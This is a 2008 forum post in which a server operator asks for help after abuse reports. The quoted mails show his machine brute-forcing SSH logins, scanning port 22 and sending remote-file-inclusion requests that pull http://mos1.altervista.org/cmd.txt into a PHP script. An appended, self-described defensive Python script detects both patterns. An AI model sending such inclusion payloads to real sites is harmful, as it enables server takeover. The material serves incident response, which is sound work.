12.03.08, 04:59 PM
nbbh
Member since: Feb 2008
Posts: 25
There is an attack going out from my server, help please :S

Friends, as I mentioned before, there is an attack going out from my server; here are the e-mails and logs I received.

Thanks to everyone for their help.

Our server IP: 89.149.254.31

Code:
Kind regards / Best regards
Thomas Turnwald

Please always include the e-mail history!
Please resend the eMail-history!

netdirekt e. K.
Kleyerstrasse 79  / Tor 13
60326 Frankfurt am Main
Germany

Phone: +49 69 9055688-0
Fax: +49 69 9055688-22

Register number: HRA 30056,
Court: Amtsgericht Frankfurt/Main
Owner: Wiethold Wagner

----- Original Message ----- 
From: "Helmut Hullen" <Hullen@t-online.de>
To: <info@netdirekt.de>
Sent: Tuesday, March 11, 2008 10:37 PM
Subject: strange requests
 
 
> Dear Sir or Madam,
>
> in the log files of a website I administer I found, among other things:
>
> 89-149-254-30.internetserviceteam.com - - [08/Mar/2008:19:55:15 +0100] "GET //include/doc/get_image.php?lang=&img=http://mos1.altervista.org/cmd.txt? HTTP/1.1" 403 351 "-" "libwww-perl/5.808"
> 89-149-254-30.internetserviceteam.com - - [08/Mar/2008:19:55:15 +0100] "GET /stabil//include/doc/get_image.php?lang=&img=http://mos1.altervista.org/cmd.txt? HTTP/1.1" 403 358 "-" "libwww-perl/5.808"
> 89-149-254-30.internetserviceteam.com - - [08/Mar/2008:19:55:15 +0100] "GET /stabil/Updates//include/doc/get_image.php?lang=&img=http://mos1.altervista.org/cmd.txt? HTTP/1.1" 403 366 "-" "libwww-perl/5.808"
> 89-149-254-30.internetserviceteam.com - - [08/Mar/2008:20:03:17 +0100] "GET /doc//include/doc/get_image.php?lang=&img=http://mos1.altervista.org/cmd.txt? HTTP/1.1" 403 355 "-" "libwww-perl/5.808"
> 89-149-254-30.internetserviceteam.com - - [08/Mar/2008:20:03:17 +0100] "GET /doc/ods-v36//include/doc/get_image.php?lang=&img=Sito in costruzione /cmd.txt? HTTP/1.1" 403 363 "-" "libwww-perl/5.808"
>
> The entries are typical of the attempts made by a malicious program.
> Could you please investigate which of your machines issued these requests
> and whether it is infected with malware? Thank you!
>
> Best regards!
> Helmut Hullen
> Wendenmaschstr. 8
> 38114 Braunschweig
> Tel. 0531-34 11 26
>
-------------------------------------------------------------------------

Code:
SSH attack
 
NTP sync'd to GMT -5
 
Begin forwarded message:
 
> smtptoaster.midasnetworks.com login failures:
> Mar 10 01:21:24 smtptoaster sshd[69283]: Invalid user mythtv from 89.149.254.31
> Mar 10 01:21:25 smtptoaster sshd[69285]: Invalid user mythtv from 89.149.254.31
> Mar 10 01:21:27 smtptoaster sshd[69287]: Invalid user mythtv from 89.149.254.31
> Mar 10 01:21:28 smtptoaster sshd[69289]: Invalid user mythtv from 89.149.254.31
> Mar 10 01:21:30 smtptoaster sshd[69291]: Invalid user oracle from 89.149.254.31
> Mar 10 01:21:31 smtptoaster sshd[69293]: Invalid user oracle from 89.149.254.31
> Mar 10 01:21:32 smtptoaster sshd[69295]: Invalid user oracle from 89.149.254.31
> Mar 10 01:21:34 smtptoaster sshd[69297]: Invalid user oracle from 89.149.254.31
> Mar 10 01:21:35 smtptoaster sshd[69299]: Invalid user oracle from 89.149.254.31
> Mar 10 01:21:36 smtptoaster sshd[69301]: Invalid user oracle from 89.149.254.31
> Mar 10 01:21:38 smtptoaster sshd[69303]: Invalid user oracle from 89.149.254.31
> Mar 10 01:21:39 smtptoaster sshd[69305]: Invalid user oracle from 89.149.254.31
> Mar 10 01:21:41 smtptoaster sshd[69307]: Invalid user oracle from 89.149.254.31
> Mar 10 01:21:42 smtptoaster sshd[69309]: Invalid user oracle from 89.149.254.31
> Mar 10 01:21:45 smtptoaster sshd[69313]: Invalid user admin from 89.149.254.31
> Mar 10 01:21:46 smtptoaster sshd[69315]: Invalid user admin from 89.149.254.31
> Mar 10 01:21:47 smtptoaster sshd[69317]: Invalid user admin from 89.149.254.31
> Mar 10 01:21:49 smtptoaster sshd[69319]: Invalid user admin from 89.149.254.31
> Mar 10 01:21:50 smtptoaster sshd[69321]: Invalid user admin from 89.149.254.31
> Mar 10 01:21:52 smtptoaster sshd[69323]: Invalid user admin from 89.149.254.31
> Mar 10 01:21:53 smtptoaster sshd[69325]: Invalid user admin from 89.149.254.31
> Mar 10 01:21:54 smtptoaster sshd[69327]: Invalid user admin from 89.149.254.31
> Mar 10 01:21:56 smtptoaster sshd[69329]: Invalid user admin from 89.149.254.31
> Mar 10 01:21:57 smtptoaster sshd[69331]: Invalid user test from 89.149.254.31
> Mar 10 01:21:58 smtptoaster sshd[69333]: Invalid user test from 89.149.254.31
> Mar 10 01:22:00 smtptoaster sshd[69335]: Invalid user test from 89.149.254.31
> Mar 10 01:22:01 smtptoaster sshd[69350]: Invalid user test from 89.149.254.31
> Mar 10 01:22:03 smtptoaster sshd[69352]: Invalid user test from 89.149.254.31
> Mar 10 01:22:04 smtptoaster sshd[69354]: Invalid user test from 89.149.254.31
> Mar 10 01:22:05 smtptoaster sshd[69356]: Invalid user test from 89.149.254.31
> Mar 10 01:22:07 smtptoaster sshd[69358]: Invalid user test from 89.149.254.31
> Mar 10 01:22:08 smtptoaster sshd[69360]: Invalid user test from 89.149.254.31
> Mar 10 01:22:09 smtptoaster sshd[69362]: Invalid user test from 89.149.254.31
> Mar 10 01:22:11 smtptoaster sshd[69364]: Invalid user test from 89.149.254.31
> Mar 10 01:22:12 smtptoaster sshd[69366]: Invalid user test from 89.149.254.31
> Mar 10 01:22:13 smtptoaster sshd[69368]: Invalid user test from 89.149.254.31
> Mar 10 01:22:15 smtptoaster sshd[69370]: Invalid user mysql from 89.149.254.31
> Mar 10 01:22:16 smtptoaster sshd[69372]: Invalid user mysql from 89.149.254.31
> Mar 10 01:22:18 smtptoaster sshd[69374]: Invalid user mysql from 89.149.254.31
> Mar 10 01:22:19 smtptoaster sshd[69376]: Invalid user setup from 89.149.254.31
> Mar 10 01:22:20 smtptoaster sshd[69378]: Invalid user setup from 89.149.254.31
> Mar 10 01:22:22 smtptoaster sshd[69380]: Invalid user setup from 89.149.254.31
> Mar 10 01:22:23 smtptoaster sshd[69382]: Invalid user setup from 89.149.254.31
> Mar 10 01:22:24 smtptoaster sshd[69384]: Invalid user setup from 89.149.254.31
> Mar 10 01:22:26 smtptoaster sshd[69386]: Invalid user user1 from 89.149.254.31
> Mar 10 01:22:27 smtptoaster sshd[69388]: Invalid user user from 89.149.254.31
> Mar 10 01:22:29 smtptoaster sshd[69390]: Invalid user user from 89.149.254.31
> Mar 10 01:22:30 smtptoaster sshd[69392]: Invalid user user from 89.149.254.31
 
 
-- 
Kind regards / Best regards
Simon Roehl
netdirekt e.K.
Kleyerstrasse 79 / Tor 13
60326 Frankfurt am Main
Germany

Phone: +49 69 9055688-0
Fax: +49 69 9055688-22
Mail: technik@netdirekt.de

Register number: HRA 30056
Court: Amtsgericht Frankfurt am Main
Owner: Wiethold Wagner
---------------------------------------------------------------------------------

Code:
-------- Original Message --------
Subject: (b2911274)Network scan from 89.149.254.31 (repeat offender)
Date: Wed, 12 Mar 2008 10:49:48 +0000 (GMT)
From: secmbox3@verizonbusiness.com
Reply to: secmbox3@verizonbusiness.com
To: abuse@netdirekt.de, abuse@unix-server.com, abuse@gblx.net
 
You are receiving this message because you are on the contact list for
89.149.254.31.  This message has been sent to abuse@netdirekt.de,
abuse@unix-server.com,  abuse@gblx.net.  At this time, this message is
for informational use only.
 
We detected a scan of part of the Verizon Business Public IP network
which appears to have originated from the source address 89.149.254.31
(89-149-254-31.internetserviceteam.com).  There have been 1 previous
offenses by this IP.  While dynamic addressing prevents us from being
able to say whether it was the same individual each time, it could be an
indication of a more serious problem.  The scanning began at
approximately 2008-03-11 02:27:42 UTC.  If neither you nor the owner of
this address are aware of this traffic, it is possible that a third
party is either forging the source address or executing an unauthorized
scan from this machine.  If you suspect the scan is being executed by an
unauthorized third party, a trojan, or a virus, please consult
http://www.cert.org/tech_tips/root_compromise.html.
 
This address attempted to scan approximately 1960 addresses on TCP/22.
 
This is a violation of Verizon Business's acceptable use policy.  For
further information, please consult: http://global.mci.com/terms/a_u_p/.
A reply to this message is not required, but the activity above must be
stopped.  If you need to contact us about this issue, please reply to
this message leaving the ticket number in the subject line.
 
Thank you
 
Verizon Business Infrastructure/Network Security Team
 
Sample of log entries:
2008-03-11 02:27:42 UTC,Src IP 89.149.254.31:21214,Dst IP 152.63.0.78:22,tcp
2008-03-11 02:27:42 UTC,Src IP 89.149.254.31:21214,Dst IP 152.63.0.76:22,tcp
2008-03-11 02:27:42 UTC,Src IP 89.149.254.31:21214,Dst IP 152.63.0.79:22,tcp
2008-03-11 02:27:42 UTC,Src IP 89.149.254.31:21214,Dst IP 152.63.0.220:22,tcp
2008-03-11 02:27:42 UTC,Src IP 89.149.254.31:21214,Dst IP 152.63.0.223:22,tcp
2008-03-11 02:27:42 UTC,Src IP 89.149.254.31:21214,Dst IP 152.63.0.221:22,tcp
2008-03-11 02:27:42 UTC,Src IP 89.149.254.31:21214,Dst IP 152.63.0.209:22,tcp
2008-03-11 02:27:42 UTC,Src IP 89.149.254.31:21214,Dst IP 152.63.0.211:22,tcp
2008-03-11 02:27:42 UTC,Src IP 89.149.254.31:21214,Dst IP 152.63.0.217:22,tcp
2008-03-11 02:27:42 UTC,Src IP 89.149.254.31:21214,Dst IP 152.63.0.208:22,tcp
 
 
-----------------------------------------------------------------------------------

Code:
-------- Original Message --------
Subject: Incident ID: BRT488159 Sent to info@netdirekt.de
Date: Wed, 12 Mar 2008 08:32:14 UT
From: soc@brasiltelecom.com.br
To: info@netdirekt.de
CC: cert@cert.br
 
Dear Sirs,
 
   It was detected on Brasil Telecom's monitoring systems that the
machine listed in this mail has been maliciously used. The traffic
details are below (Note that the date/time is in the format: YYYY-MM-DD HH:MM:SS).
Please respond accordingly to this Incident.

   Therefore the IP 89.149.254.31 will be blocked on all our Data
Centers for 60 minutes.

   To reply to this e-mail, please keep the ID BRT488159 in the Subject Field.
 
Thanks,
 
CSIRT Brasil Telecom
 
 
2008-03-12 08:23:57 GMT
 
89.149.254.31 1:2002889 SSH Brute Force Attempt
 
 
---
This message was sent automatically by the SOC - Security Operations Center of
Brasil Telecom S.A. and may contain privileged and/or confidential information
and must not be forwarded. Should further clarification or action by the
Security Incident Response team be required, please contact the SOC by telephone
at +55(61)3305-5565 (24x7 service) or by e-mail at soc.nivel1@brasiltelecom.com.br.
 
 
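As an added defender-side example (not from the original post or from any of the abuse mails), this Python script flags the two patterns the quoted logs show: a burst of sshd "Invalid user" failures from a single source within a short window, and an Apache request that passes a remote URL as a query parameter value. The sample log lines are constructed to match the quoted formats; attacker.example and the 192.0.2.x / 198.51.100.x addresses are placeholders.

```python
import re
from collections import defaultdict
from datetime import datetime

# Constructed sample lines in the two formats quoted in the abuse mails above.
SSHD_LINES = """\
Mar 10 01:21:24 smtptoaster sshd[69283]: Invalid user mythtv from 89.149.254.31
Mar 10 01:21:30 smtptoaster sshd[69291]: Invalid user oracle from 89.149.254.31
Mar 10 01:21:45 smtptoaster sshd[69313]: Invalid user admin from 89.149.254.31
Mar 10 01:21:57 smtptoaster sshd[69331]: Invalid user test from 89.149.254.31
Mar 10 01:22:15 smtptoaster sshd[69370]: Invalid user mysql from 89.149.254.31
Mar 10 03:10:02 smtptoaster sshd[70001]: Invalid user bob from 192.0.2.10""".splitlines()
APACHE_LINES = [
    '89-149-254-30.internetserviceteam.com - - [08/Mar/2008:19:55:15 +0100] "GET '
    '//include/doc/get_image.php?lang=&img=http://attacker.example/cmd.txt? HTTP/1.1" '
    '403 351 "-" "libwww-perl/5.808"',
    '198.51.100.7 - - [08/Mar/2008:19:56:01 +0100] "GET /include/doc/get_image.php'
    '?lang=en&img=logo.png HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
]
SSHD_RE = re.compile(r"^(\w{3} +\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: Invalid user (\S+) from (\S+)$")
APACHE_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3}) \S+ "[^"]*" "([^"]*)"$')
RFI_RE = re.compile(r"[?&][^=&]+=(?:https?|ftp)://", re.I)  # parameter value is a remote URL

def ssh_bruteforce_sources(lines, threshold=5, window_s=120, year=2008):
    """Map each source that logged >= `threshold` 'Invalid user' events within any
    `window_s`-second span to the sorted usernames it tried (syslog has no year)."""
    events = defaultdict(list)
    for line in lines:
        m = SSHD_RE.match(line)
        if m:
            ts = datetime.strptime(f"{year} {m.group(1)}", "%Y %b %d %H:%M:%S")
            events[m.group(3)].append((ts, m.group(2)))
    hits = {}
    for src, evs in events.items():
        evs.sort()
        for i in range(len(evs) - threshold + 1):  # slide a threshold-sized window
            if (evs[i + threshold - 1][0] - evs[i][0]).total_seconds() <= window_s:
                hits[src] = sorted({user for _, user in evs})
                break
    return hits

def rfi_attempts(lines):
    """Client, path, status and user agent of each request passing a remote URL as a parameter."""
    found = []
    for line in lines:
        m = APACHE_RE.match(line)
        if m and RFI_RE.search(m.group(3)):
            found.append({"client": m.group(1), "path": m.group(3), "status": int(m.group(4)), "ua": m.group(5)})
    return found
```

Run against a real auth.log and access_log, the same two functions give a quick answer to the question the abuse mails raise: which source address is probing, with which usernames, and whether the web requests carry remote-include URLs (note that the 403 responses in the quoted log mean those particular requests were refused).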